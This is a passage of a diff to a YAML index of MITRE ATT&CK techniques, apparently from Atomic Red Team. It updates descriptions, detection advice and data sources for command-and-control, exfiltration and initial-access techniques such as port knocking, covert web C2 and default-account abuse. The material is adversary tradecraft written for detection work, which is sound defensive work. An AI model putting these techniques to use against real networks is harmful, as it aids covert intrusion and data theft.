sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. 
This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. + + Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. 
+ + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) + name: Traffic Signaling + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + revoked: false + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_defense_bypassed: + - Defensive network service scanning + x_mitre_detection: |- + Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. + + The Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN) + x_mitre_network_requirements: true x_mitre_platforms: - Linux - macOS - Windows - Network - x_mitre_network_requirements: true - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. 
- x_mitre_defense_bypassed: - - Defensive network service scanning - x_mitre_version: '2.1' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Josh Day, Gigamon atomic_tests: [] T1071.001: technique: - id: attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161 + created: '2020-03-15T16:13:46.151Z' + modified: '2020-03-26T20:15:35.821Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1071.001 + url: https://attack.mitre.org/techniques/T1071/001 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Protocols description: "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results 
@@ -61670,34 +65048,9 @@ command-and-control: in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. " - name: Web Protocols - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1071.001 - url: https://attack.mitre.org/techniques/T1071/001 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-26T20:15:35.821Z' - created: '2020-03-15T16:13:46.151Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture + id: attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have 
@@ -61706,8 +65059,13 @@ command-and-control: syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. " - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1071.001 atomic_tests: - name: Malicious User Agents - Powershell @@ -61788,19 +65146,8 @@ command-and-control: name: sh T1102: technique: - created: '2017-05-31T21:31:13.915Z' - modified: '2020-03-26T23:26:10.297Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Web Service - description: |- - Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. - - Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed). + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1102 
@@ -61809,14 +65156,27 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User + description: |- + Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. + + Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed). 
+ name: Web Service + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-03-26T23:26:10.297Z' + created: '2017-05-31T21:31:13.915Z' + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + x_mitre_contributors: + - Anastasios Pingios + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Connection Creation' x_mitre_detection: 'Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and @@ -61825,16 +65185,12 @@ command-and-control: for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection - x_mitre_contributors: - - Anastasios Pingios - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] exfiltration: T1020: @@ -61858,8 +65214,10 @@ exfiltration: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: exfiltration - modified: '2020-10-22T02:24:54.881Z' + modified: '2021-04-22T20:21:10.590Z' created: '2017-05-31T21:30:29.458Z' + x_mitre_contributors: + - ExtraHop x_mitre_is_subtechnique: false x_mitre_platforms: - Linux 
@@ -61871,9 +65229,12 @@ exfiltration: Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process use of network + - 'Command: Command Execution' + - 'Script: Script Execution' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' x_mitre_version: '1.2' identifier: T1020 atomic_tests: @@ -61945,10 +65306,8 @@ exfiltration: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_version: '1.0' identifier: T1030 atomic_tests: @@ -62040,11 +65399,11 @@ exfiltration: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_version: '1.2' identifier: T1048 atomic_tests: 
@@ -62142,10 +65501,11 @@ exfiltration: never been seen before are suspicious.(Citation: University of Birmingham C2) ' x_mitre_data_sources: - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62179,8 +65539,11 @@ exfiltration: Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces. x_mitre_data_sources: - - Process monitoring - - User interface + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62188,8 +65551,18 @@ exfiltration: atomic_tests: [] T1041: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:41.804Z' + modified: '2020-03-12T15:59:47.470Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exfiltration Over C2 Channel + description: Adversaries may steal data by exfiltrating it over an existing + command and control channel. Stolen data is encoded into the normal communications + channel using the same protocol as command and control communications. external_references: - source_name: mitre-attack external_id: T1041 
@@ -62198,36 +65571,27 @@ exfiltration: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: Adversaries may steal data by exfiltrating it over an existing - command and control channel. Stolen data is encoded into the normal communications - channel using the same protocol as command and control communications. - name: Exfiltration Over C2 Channel - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-12T15:59:47.470Z' - created: '2017-05-31T21:30:41.804Z' - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_data_sources: - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1011: technique: @@ -62263,8 +65627,11 @@ exfiltration: x_mitre_contributors: - Itzik Kotler, SafeBreach x_mitre_data_sources: - - User interface - - Process monitoring + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_version: '1.1' atomic_tests: [] T1052: @@ -62302,9 +65669,10 @@ exfiltration: x_mitre_detection: Monitor file access on removable media. Detect processes that execute when removable media are mounted. x_mitre_data_sources: - - Process monitoring - - Data loss prevention - - File monitoring + - 'Process: Process Creation' + - 'File: File Access' + - 'Drive: Drive Creation' + - 'Command: Command Execution' x_mitre_version: '1.1' atomic_tests: [] T1048.001: @@ -62353,11 +65721,11 @@ exfiltration: If recovered, these keys can be used to decrypt network data from command and control channels. " x_mitre_data_sources: - - Malware reverse engineering - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS 
@@ -62365,25 +65733,6 @@ exfiltration: atomic_tests: [] T1048.003: technique: - created: '2020-03-15T15:37:47.583Z' - modified: '2020-03-28T00:50:31.361Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - type: attack-pattern - id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b - description: "Adversaries may steal data by exfiltrating it over an un-encrypted - network protocol other than that of the existing command and control channel. - The data may also be sent to an alternate network location from the main command - and control server. \n\nAdversaries may opt to obfuscate this data, without - the use of encryption, within network protocols that are natively unencrypted - (such as HTTP, FTP, or DNS). This may include custom or publicly available - encoding/compression algorithms (such as base64) as well as embedding data - within protocol headers and fields. " - name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1048.003 
@@ -62392,24 +65741,44 @@ exfiltration: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture - - Process use of network + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol + description: "Adversaries may steal data by exfiltrating it over an un-encrypted + network protocol other than that of the existing command and control channel. + The data may also be sent to an alternate network location from the main command + and control server. \n\nAdversaries may opt to obfuscate this data, without + the use of encryption, within network protocols that are natively unencrypted + (such as HTTP, FTP, or DNS). This may include custom or publicly available + encoding/compression algorithms (such as base64) as well as embedding data + within protocol headers and fields. " + id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + modified: '2020-03-28T00:50:31.361Z' + created: '2020-03-15T15:37:47.583Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2) ' - x_mitre_network_requirements: true - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1048.003 atomic_tests: - name: Exfiltration Over Alternative Protocol - HTTP @@ -62559,12 +65928,10 @@ exfiltration: never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity. x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -62599,9 +65966,10 @@ exfiltration: x_mitre_detection: Monitor file access on removable media. Detect processes that execute when removable media are mounted. x_mitre_data_sources: - - Process monitoring - - Data loss prevention - - File monitoring + - 'Process: Process Creation' + - 'File: File Access' + - 'Drive: Drive Creation' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS 
@@ -62636,12 +66004,10 @@ exfiltration: - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have @@ -62683,12 +66049,10 @@ exfiltration: or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity. x_mitre_data_sources: - - Process monitoring - - Process use of network - - Packet capture - - Netflow/Enclave netflow - - Network protocol analysis - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'File: File Access' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS 
@@ -62696,41 +66060,40 @@ exfiltration: atomic_tests: [] T1029: technique: - id: attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Scheduled Transfer - description: |- - Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. - - When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). + created: '2017-05-31T21:30:34.139Z' + modified: '2020-03-28T00:26:48.769Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1029 external_id: T1029 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-28T00:26:48.769Z' - created: '2017-05-31T21:30:34.139Z' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_network_requirements: true + description: |- + Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability. 
+ + When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). + name: Scheduled Transfer + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466 + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious. - x_mitre_data_sources: - - Netflow/Enclave netflow - - Process use of network - - Process monitoring - x_mitre_version: '1.1' + x_mitre_network_requirements: true + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false atomic_tests: [] T1020.001: technique: @@ -62778,9 +66141,8 @@ exfiltration: x_mitre_platforms: - Network x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture - - Network protocol analysis + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze 
@@ -62793,18 +66155,13 @@ exfiltration: atomic_tests: [] T1537: technique: - external_references: - - source_name: mitre-attack - external_id: T1537 - url: https://attack.mitre.org/techniques/T1537 - - source_name: DOJ GRU Indictment Jul 2018 - description: Mueller, R. (2018, July 13). Indictment - United States of America - vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. - url: https://www.justice.gov/file/1080281/download - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Transfer Data to Cloud Account + created: '2019-08-30T13:03:04.038Z' + modified: '2021-03-08T10:33:01.280Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: exfiltration + type: attack-pattern + id: attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6 description: "Adversaries may exfiltrate data by transferring the data, including backups of cloud environments, to another cloud account they control on the same service to avoid typical file transfers/downloads and network-based exfiltration 
@@ -62817,32 +66174,36 @@ exfiltration: have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) " - id: attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: exfiltration - modified: '2020-03-29T23:43:44.256Z' - created: '2019-08-30T13:03:04.038Z' - x_mitre_is_subtechnique: false + name: Transfer Data to Cloud Account + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1537 + url: https://attack.mitre.org/techniques/T1537 + - source_name: DOJ GRU Indictment Jul 2018 + description: Mueller, R. (2018, July 13). Indictment - United States of America + vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018. + url: https://www.justice.gov/file/1080281/download + x_mitre_platforms: + - IaaS + x_mitre_contributors: + - Praetorian + x_mitre_network_requirements: true + x_mitre_permissions_required: + - User + x_mitre_version: '1.1' + x_mitre_data_sources: + - 'Snapshot: Snapshot Creation' + - 'Snapshot: Snapshot Modification' + - 'Cloud Storage: Cloud Storage Modification' + - 'Cloud Storage: Cloud Storage Creation' x_mitre_detection: 'Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. 
' - x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs - x_mitre_version: '1.0' - x_mitre_permissions_required: - - User - x_mitre_network_requirements: true - x_mitre_contributors: - - Praetorian - x_mitre_platforms: - - Azure - - AWS - - GCP + x_mitre_is_subtechnique: false atomic_tests: [] initial-access: T1078.004: @@ -62882,20 +66243,17 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' + modified: '2021-03-16T12:45:15.399Z' created: '2020-03-13T20:36:57.378Z' x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - Azure AD - Office 365 + - SaaS + - IaaS + - Google Workspace x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours. @@ -62903,7 +66261,7 @@ initial-access: - User - Administrator x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' atomic_tests: [] T1195.003: technique: @@ -62934,11 +66292,6 @@ initial-access: x_mitre_detection: Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. - x_mitre_data_sources: - - Component firmware - - BIOS - - Disk forensics - - EFI x_mitre_platforms: - Linux - macOS 
@@ -62979,9 +66332,6 @@ initial-access: or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ' - x_mitre_data_sources: - - File monitoring - - Web proxy x_mitre_platforms: - Linux - macOS @@ -63025,9 +66375,6 @@ initial-access: - Linux - macOS - Windows - x_mitre_data_sources: - - File monitoring - - Web proxy x_mitre_detection: 'Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking 
@@ -63048,15 +66395,22 @@ initial-access: url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. - source_name: Metasploit SSH Module url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. + description: Metasploit. (n.d.). Retrieved April 12, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Default Accounts description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. 
Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d @@ -63070,9 +66424,9 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' + modified: '2021-04-05T20:14:26.846Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator 
@@ -63082,20 +66436,18 @@ initial-access: for default credentials or SSH keys, and if any are discovered, they should be updated immediately. x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers identifier: T1078.001 atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges @@ -63182,8 +66534,8 @@ initial-access: Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. x_mitre_data_sources: - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_platforms: - Linux - macOS @@ -63270,12 +66622,11 @@ initial-access: Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate 